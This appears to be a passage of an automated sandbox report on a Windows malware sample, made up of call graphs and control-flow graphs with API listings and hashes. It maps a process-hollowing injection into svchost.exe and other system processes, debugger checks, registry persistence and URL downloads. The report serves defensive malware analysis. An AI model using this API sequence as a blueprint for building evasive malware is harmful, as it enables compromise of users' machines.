1422->1423 1424 7ff79e381d77 InternetOpenUrlW 1422->1424 1425 7ff79e381e1e 1423->1425 1426 7ff79e381df8 InternetCloseHandle InternetCloseHandle Sleep 1423->1426 1424->1423 1427 7ff79e381dae InternetCloseHandle Sleep 1424->1427 1428 7ff79e381e28 InternetCloseHandle InternetOpenUrlW 1425->1428 1429 7ff79e381e85 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1425->1429 1426->1420 1427->1420 1428->1429 1430 7ff79e381e6a InternetCloseHandle Sleep 1428->1430 1431 7ff79e381eea InternetCloseHandle InternetCloseHandle 1429->1431 1432 7ff79e381f04 1429->1432 1430->1420 1433 7ff79e381f83 1431->1433 1434 7ff79e381f0c InternetReadFile 1432->1434 1435 7ff79e381f5a InternetCloseHandle InternetCloseHandle 1432->1435 1434->1432 1434->1435 1435->1433 1436 7ff79e3830dc 1437 7ff79e3830e5 1436->1437 1438 7ff79e3831d1 1437->1438 1441 7ff79e383c24 RegDeleteKeyW 1437->1441 1442 7ff79e383e24 9 API calls 1437->1442 1443 7ff79e3839b4 3 API calls 1437->1443 1445 7ff79e3845c4 CreateFileW 1437->1445 1450 7ff79e383b84 RegOpenKeyExW 1437->1450 1441->1437 1442->1437 1444 7ff79e3831c1 Sleep 1443->1444 1444->1437 1446 7ff79e38465a 1445->1446 1447 7ff79e38461f 1445->1447 1446->1437 1453 7ff79e384544 SetFilePointer WriteFile SetEndOfFile 1447->1453 1449 7ff79e38463b SetFileAttributesW CloseHandle 1449->1446 1451 7ff79e383bd8 RegSetValueExW RegCloseKey 1450->1451 1452 7ff79e383c12 1450->1452 1451->1452 1452->1437 1453->1449 1476 7ff79e382f9c 1477 7ff79e3838c4 11 API calls 1476->1477 1478 7ff79e382fdb 1477->1478 1479 7ff79e3846e4 17 API calls 1478->1479 1480 7ff79e382fff 1479->1480 1481 7ff79e3840c4 5 API calls 1480->1481 1482 7ff79e383022 1481->1482 1483 7ff79e3840e4 13 API calls 1482->1483 1484 7ff79e383037 GetProcessHeap HeapFree 1483->1484 1364 7ff79e38338c 1367 7ff79e382048 GetModuleFileNameW 1364->1367 1368 7ff79e3820c9 1367->1368 1374 7ff79e3820c4 1367->1374 1369 7ff79e38211d 1368->1369 1370 7ff79e382107 1368->1370 1410 7ff79e381f88 ExpandEnvironmentStringsW 1369->1410 1371 7ff79e38213b 1370->1371 1372 7ff79e382111 1370->1372 1411 7ff79e381fc8 ExpandEnvironmentStringsW 1371->1411 1372->1374 1412 7ff79e382008 ExpandEnvironmentStringsW 1372->1412 1375 7ff79e382132 1375->1374 1378 7ff79e38218d CreateProcessW 1375->1378 1378->1374 1379 7ff79e3821e8 CreateFileW 1378->1379 1379->1374 1380 7ff79e38222f GetFileSize 1379->1380 1381 7ff79e38224d 1380->1381 1382 7ff79e382257 CloseHandle 1380->1382 1381->1382 1383 7ff79e382267 VirtualAlloc 1381->1383 1382->1374 1384 7ff79e3822a1 ReadFile 1383->1384 1385 7ff79e382291 CloseHandle 1383->1385 1386 7ff79e3822ce VirtualFree CloseHandle 1384->1386 1387 7ff79e3822f1 CloseHandle GetThreadContext 1384->1387 1385->1374 1386->1374 1388 7ff79e382359 ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 1387->1388 1389 7ff79e382341 VirtualFree 1387->1389 1390 7ff79e3823f8 VirtualAllocEx 1388->1390 1391 7ff79e3823e0 VirtualFree 1388->1391 1389->1374 1392 7ff79e38247b WriteProcessMemory 1390->1392 1393 7ff79e382463 VirtualFree 1390->1393 1391->1374 1394 7ff79e3824b1 VirtualFree 1392->1394 1397 7ff79e3824c9 1392->1397 1393->1374 1394->1374 1395 7ff79e3824ff WriteProcessMemory 1396 7ff79e38258a VirtualFree 1395->1396 1395->1397 1396->1374 1397->1395 1400 7ff79e3825a7 1397->1400 1398 7ff79e382619 RtlCompareMemory 1398->1400 1407 7ff79e38266c 1398->1407 1399 7ff79e382898 WriteProcessMemory SetThreadContext 1401 7ff79e38291e VirtualFree 1399->1401 1402 7ff79e382933 ResumeThread 1399->1402 1400->1398 1400->1399 1401->1374 1403 7ff79e38295a VirtualFree 1402->1403 1404 7ff79e382945 VirtualFree 1402->1404 1403->1374 1404->1374 1405 7ff79e382893 1405->1399 1406 7ff79e38279c ReadProcessMemory WriteProcessMemory 1408 7ff79e382889 1406->1408 1409 7ff79e382871 VirtualFree 1406->1409 1407->1405 1407->1406 1408->1407 1409->1374 1410->1375 1411->1375 1412->1375 1413 7ff79e3833ac 1414 7ff79e382048 37 API calls 1413->1414 1415 7ff79e3833bf 1414->1415 1454 7ff79e3831ec 1455 7ff79e3831f5 1454->1455 1456 7ff79e38320e 1455->1456 1459 7ff79e38306c 1455->1459 1464 7ff79e382e6c CreateMutexA 1459->1464 1462 7ff79e3830cc Sleep 1462->1455 1463 7ff79e383087 Sleep CreateThread WaitForSingleObject 1463->1462 1465 7ff79e382e98 ReleaseMutex CloseHandle 1464->1465 1466 7ff79e382eb5 GetLastError 1464->1466 1467 7ff79e382ef7 1465->1467 1468 7ff79e382ec2 ReleaseMutex CloseHandle 1466->1468 1469 7ff79e382edf ReleaseMutex CloseHandle 1466->1469 1467->1462 1467->1463 1468->1467 1469->1467 1470 7ff79e382f0c CreateMutexA 1471 7ff79e382f4e GetLastError 1470->1471 1472 7ff79e382f31 ReleaseMutex CloseHandle 1470->1472 1474 7ff79e382f5b ReleaseMutex CloseHandle 1471->1474 1475 7ff79e382f78 ReleaseMutex CloseHandle 1471->1475 1473 7ff79e382f90 1472->1473 1474->1473 1475->1473

                                                                                                                                                                  Callgraph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                  • Disassembly available
                                                                                                                                                                  callgraph 0 Function_00007FF79E38B15F 1 Function_00007FF79E38D361 2 Function_00007FF79E38A061 3 Function_00007FF79E38345C 7 Function_00007FF79E384264 3->7 18 Function_00007FF79E383A74 3->18 22 Function_00007FF79E38327C 3->22 32 Function_00007FF79E38321C 3->32 56 Function_00007FF79E383CE4 3->56 60 Function_00007FF79E3833EC 3->60 61 Function_00007FF79E3832EC 3->61 87 Function_00007FF79E383F14 3->87 92 Function_00007FF79E3843A4 3->92 95 Function_00007FF79E3810A0 3->95 4 Function_00007FF79E38D365 5 Function_00007FF79E38CF65 6 Function_00007FF79E38A258 33 Function_00007FF79E383B24 7->33 48 Function_00007FF79E383B54 7->48 8 Function_00007FF79E383C64 9 Function_00007FF79E38DE59 10 Function_00007FF79E38A05A 11 Function_00007FF79E38C65C 12 Function_00007FF79E38DE70 13 Function_00007FF79E38306C 14 Function_00007FF79E382E6C 13->14 15 Function_00007FF79E38A772 16 Function_00007FF79E38C673 17 Function_00007FF79E38A776 42 Function_00007FF79E383744 18->42 97 Function_00007FF79E3839B4 18->97 105 Function_00007FF79E3838C4 18->105 19 Function_00007FF79E384674 20 Function_00007FF79E38A27F 21 Function_00007FF79E38F281 98 Function_00007FF79E3844B4 22->98 22->105 23 Function_00007FF79E382978 24 Function_00007FF79E38A778 25 Function_00007FF79E38F278 26 Function_00007FF79E383B84 27 Function_00007FF79E38338C 46 Function_00007FF79E382048 27->46 28 Function_00007FF79E38EF92 29 Function_00007FF79E381F88 30 Function_00007FF79E382A88 30->23 31 Function_00007FF79E38A188 34 Function_00007FF79E383C24 35 Function_00007FF79E383E24 36 Function_00007FF79E38C91A 37 Function_00007FF79E38D91D 38 Function_00007FF79E38F232 39 Function_00007FF79E38D33F 40 Function_00007FF79E38DC46 41 Function_00007FF79E38D339 88 Function_00007FF79E383714 42->88 43 Function_00007FF79E384544 44 Function_00007FF79E38A052 45 Function_00007FF79E38CD54 46->29 82 Function_00007FF79E382008 46->82 111 Function_00007FF79E381FC8 46->111 47 Function_00007FF79E38DC55 49 Function_00007FF79E381050 50 Function_00007FF79E38A04E 51 Function_00007FF79E381CDC 52 Function_00007FF79E3830DC 52->26 52->34 52->35 52->97 107 Function_00007FF79E3845C4 52->107 53 Function_00007FF79E3836D8 54 Function_00007FF79E38EFD8 55 Function_00007FF79E3846E4 55->19 57 Function_00007FF79E3840E4 103 Function_00007FF79E382CB8 57->103 58 Function_00007FF79E38B3DA 59 Function_00007FF79E38A0DD 61->8 61->55 61->57 61->105 106 Function_00007FF79E3840C4 61->106 62 Function_00007FF79E3831EC 62->13 63 Function_00007FF79E3836EC 64 Function_00007FF79E38BCF1 65 Function_00007FF79E38ABF2 66 Function_00007FF79E38E8F3 67 Function_00007FF79E38B2F4 68 Function_00007FF79E38C2F5 69 Function_00007FF79E3836FC 70 Function_00007FF79E38C501 71 Function_00007FF79E38D904 72 Function_00007FF79E38ABF7 73 Function_00007FF79E38C2F7 74 Function_00007FF79E384004 75 Function_00007FF79E384404 75->48 76 Function_00007FF79E38ABF9 77 Function_00007FF79E38C2F9 78 Function_00007FF79E38ABFB 79 Function_00007FF79E381000 80 Function_00007FF79E382F0C 81 Function_00007FF79E383609 83 Function_00007FF79E38D615 84 Function_00007FF79E38D915 85 Function_00007FF79E38B508 86 Function_00007FF79E38E008 89 Function_00007FF79E38359D 90 Function_00007FF79E382F9C 90->8 90->55 90->57 90->105 90->106 91 Function_00007FF79E38E997 93 Function_00007FF79E38E999 94 Function_00007FF79E38E99B 95->49 95->79 96 Function_00007FF79E3833AC 96->46 98->75 99 Function_00007FF79E38BEAD 100 Function_00007FF79E38DEC1 101 Function_00007FF79E38DCC2 102 Function_00007FF79E38D0C4 103->30 104 Function_00007FF79E38D8B8 105->42 106->74 107->43 108 Function_00007FF79E38EBBE 109 Function_00007FF79E38A2D0 110 Function_00007FF79E3833CC 110->46 112 Function_00007FF79E38C9CB

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 231 7ff79e382048-7ff79e3820c2 GetModuleFileNameW 232 7ff79e3820c9-7ff79e382105 231->232 233 7ff79e3820c4 231->233 235 7ff79e38211d-7ff79e382139 call 7ff79e381f88 232->235 236 7ff79e382107-7ff79e38210f 232->236 234 7ff79e38296d-7ff79e382975 233->234 245 7ff79e38217c-7ff79e382186 235->245 237 7ff79e38213b-7ff79e382157 call 7ff79e381fc8 236->237 238 7ff79e382111-7ff79e382119 236->238 237->245 240 7ff79e38211b-7ff79e382177 238->240 241 7ff79e382159-7ff79e382175 call 7ff79e382008 238->241 240->234 241->245 248 7ff79e38218d-7ff79e3821e1 CreateProcessW 245->248 249 7ff79e382188 245->249 251 7ff79e3821e8-7ff79e382228 CreateFileW 248->251 252 7ff79e3821e3 248->252 249->234 253 7ff79e38222a 251->253 254 7ff79e38222f-7ff79e38224b GetFileSize 251->254 252->234 253->234 255 7ff79e38224d-7ff79e382255 254->255 256 7ff79e382257-7ff79e382262 CloseHandle 254->256 255->256 257 7ff79e382267-7ff79e38228f VirtualAlloc 255->257 256->234 258 7ff79e3822a1-7ff79e3822cc ReadFile 257->258 259 7ff79e382291-7ff79e38229c CloseHandle 257->259 260 7ff79e3822ce-7ff79e3822ec VirtualFree CloseHandle 258->260 261 7ff79e3822f1-7ff79e38233f CloseHandle GetThreadContext 258->261 259->234 260->234 262 7ff79e382359-7ff79e3823de ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 261->262 263 7ff79e382341-7ff79e382354 VirtualFree 261->263 264 7ff79e3823f8-7ff79e382461 VirtualAllocEx 262->264 265 7ff79e3823e0-7ff79e3823f3 VirtualFree 262->265 263->234 266 7ff79e38247b-7ff79e3824af WriteProcessMemory 264->266 267 7ff79e382463-7ff79e382476 VirtualFree 264->267 265->234 268 7ff79e3824c9-7ff79e3824d4 266->268 269 7ff79e3824b1-7ff79e3824c4 VirtualFree 266->269 267->234 270 7ff79e3824e6-7ff79e3824f9 268->270 269->234 271 7ff79e3825a7-7ff79e3825ee 270->271 272 7ff79e3824ff-7ff79e382588 WriteProcessMemory 270->272 275 7ff79e382600-7ff79e382613 271->275 273 7ff79e38258a-7ff79e38259d VirtualFree 272->273 274 7ff79e3825a2 272->274 273->234 274->270 277 7ff79e382619-7ff79e382668 RtlCompareMemory 275->277 278 7ff79e382898-7ff79e38291c WriteProcessMemory SetThreadContext 275->278 279 7ff79e38266c-7ff79e382695 277->279 280 7ff79e38266a 277->280 281 7ff79e38291e-7ff79e382931 VirtualFree 278->281 282 7ff79e382933-7ff79e382943 ResumeThread 278->282 284 7ff79e3826a0-7ff79e3826ae 279->284 280->275 281->234 285 7ff79e38295a-7ff79e382967 VirtualFree 282->285 286 7ff79e382945-7ff79e382958 VirtualFree 282->286 287 7ff79e3826b4-7ff79e38273f 284->287 288 7ff79e382893 284->288 285->234 286->234 289 7ff79e382751-7ff79e38275f 287->289 288->278 290 7ff79e38288e 289->290 291 7ff79e382765-7ff79e382798 289->291 290->284 292 7ff79e38279c-7ff79e38286f ReadProcessMemory WriteProcessMemory 291->292 293 7ff79e38279a 291->293 295 7ff79e382889 292->295 296 7ff79e382871-7ff79e382884 VirtualFree 292->296 293->289 295->290 296->234
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                  • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                  • API String ID: 514040917-3001742581
                                                                                                                                                                  • Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                  • Instruction ID: 369c8795aa68b66d20d67513a098d9e22057c890c3eb3eaf8e6d8a6151349329
                                                                                                                                                                  • Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                  • Instruction Fuzzy Hash: F732C93261CAC586D774DB26E8947AAB3A1FBC9B84F404139DA8D83B58DF7CD444CB20

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 297 7ff79e38345c-7ff79e383472 call 7ff79e3810a0 call 7ff79e38321c 302 7ff79e38347c-7ff79e3834aa call 7ff79e384264 call 7ff79e383ce4 call 7ff79e383f14 297->302 303 7ff79e383474-7ff79e383476 ExitProcess 297->303 310 7ff79e3834ac-7ff79e3834bd call 7ff79e3843a4 302->310 311 7ff79e3834fb-7ff79e38350e call 7ff79e383f14 302->311 318 7ff79e3834d2-7ff79e3834d4 ExitProcess 310->318 319 7ff79e3834bf-7ff79e3834d0 call 7ff79e3843a4 310->319 316 7ff79e38354c-7ff79e38355f call 7ff79e383f14 311->316 317 7ff79e383510-7ff79e383521 call 7ff79e3843a4 311->317 329 7ff79e3835a2-7ff79e3835b8 call 7ff79e383a74 call 7ff79e3833ec 316->329 330 7ff79e383561-7ff79e383572 call 7ff79e3843a4 316->330 326 7ff79e38352b call 7ff79e38327c 317->326 327 7ff79e383523-7ff79e383525 ExitProcess 317->327 319->318 328 7ff79e3834da call 7ff79e3832ec 319->328 336 7ff79e383530-7ff79e383535 326->336 338 7ff79e3834df-7ff79e3834e4 328->338 349 7ff79e38360e-7ff79e3836d0 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 329->349 350 7ff79e3835ba-7ff79e3835cb call 7ff79e3843a4 329->350 339 7ff79e38357c call 7ff79e38327c 330->339 340 7ff79e383574-7ff79e383576 ExitProcess 330->340 341 7ff79e383537-7ff79e383542 Sleep 336->341 342 7ff79e383544-7ff79e383546 ExitProcess 336->342 344 7ff79e3834e6-7ff79e3834f1 Sleep 338->344 345 7ff79e3834f3-7ff79e3834f5 ExitProcess 338->345 348 7ff79e383581-7ff79e383586 339->348 341->336 344->338 351 7ff79e383588-7ff79e383593 Sleep 348->351 352 7ff79e383595-7ff79e383597 ExitProcess 348->352 355 7ff79e3835cd-7ff79e3835de call 7ff79e3843a4 350->355 356 7ff79e3835e0-7ff79e3835e2 ExitProcess 350->356 351->348 355->356 359 7ff79e3835e8 call 7ff79e3832ec 355->359 361 7ff79e3835ed-7ff79e3835f2 359->361 362 7ff79e3835f4-7ff79e3835ff Sleep 361->362 363 7ff79e383601-7ff79e383603 ExitProcess 361->363 362->361
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                  • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                  • API String ID: 613740775-1953711635
                                                                                                                                                                  • Opcode ID: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
                                                                                                                                                                  • Instruction ID: 2cb6ea04600ea2e6fddbef7c521bc1e98f5fff0a7ca09a6b1eea770f3f90951a
                                                                                                                                                                  • Opcode Fuzzy Hash: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
                                                                                                                                                                  • Instruction Fuzzy Hash: C861FA30A1CA4391FB74BB31E8D52BEA2A1BF94741FD0413ED45E866E6DE6DE4098730

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 434396405-0
                                                                                                                                                                  • Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                  • Instruction ID: f2644199580ae3817c01c8c8a36d6630df44c7c82e66e898f314d47b44282d07
                                                                                                                                                                  • Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                  • Instruction Fuzzy Hash: D431193261CA8186D760EB25E49072EF7A0FBD4B90F505139FA8E83B68DF7CD4418B20

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3920101602-0
                                                                                                                                                                  • Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                  • Instruction ID: 36b0a1b9f60c03f2638d78677e9b0b06801eb7d4e396eb5b73679280de3d519b
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                  • Instruction Fuzzy Hash: 1CF0822090C28281F774AB75E484379E790BF55B08F80017CD98D46795DF6CE509DB31

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 422 7ff79e381050-7ff79e38108c LoadLibraryA GetProcAddress
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                                                  • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                  • Instruction ID: 883637d760fc59d1f34f8c82078a7220b8016c8db8e1eac40746efaadd55e39b
                                                                                                                                                                  • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                  • Instruction Fuzzy Hash: 68E09276508F8086C620EB15F88001AB7B4FBC8794FA04129EACD82B28DF3CC169CB10

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF79E383744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF79E383784
                                                                                                                                                                    • Part of subcall function 00007FF79E383744: GetVolumeInformationW.KERNELBASE ref: 00007FF79E383801
                                                                                                                                                                    • Part of subcall function 00007FF79E383744: wsprintfW.USER32 ref: 00007FF79E3838A2
                                                                                                                                                                  • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E38390D
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383922
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383935
                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383945
                                                                                                                                                                  • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383958
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E38396D
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383980
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383995
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                  • Opcode ID: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
                                                                                                                                                                  • Instruction ID: c1eb9984d21fd426991567ab7f4649977ebc8caa60f08438d227ae40bcfd0702
                                                                                                                                                                  • Opcode Fuzzy Hash: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
                                                                                                                                                                  • Instruction Fuzzy Hash: 1F116A3161898282DB70EF35F89476AA362FBC4B80F805039D94E83E29DE7CD115C760

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF79E383744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF79E383784
                                                                                                                                                                    • Part of subcall function 00007FF79E383744: GetVolumeInformationW.KERNELBASE ref: 00007FF79E383801
                                                                                                                                                                    • Part of subcall function 00007FF79E383744: wsprintfW.USER32 ref: 00007FF79E3838A2
                                                                                                                                                                    • Part of subcall function 00007FF79E3838C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E38390D
                                                                                                                                                                    • Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383922
                                                                                                                                                                    • Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383935
                                                                                                                                                                    • Part of subcall function 00007FF79E3838C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383945
                                                                                                                                                                    • Part of subcall function 00007FF79E3838C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383958
                                                                                                                                                                    • Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E38396D
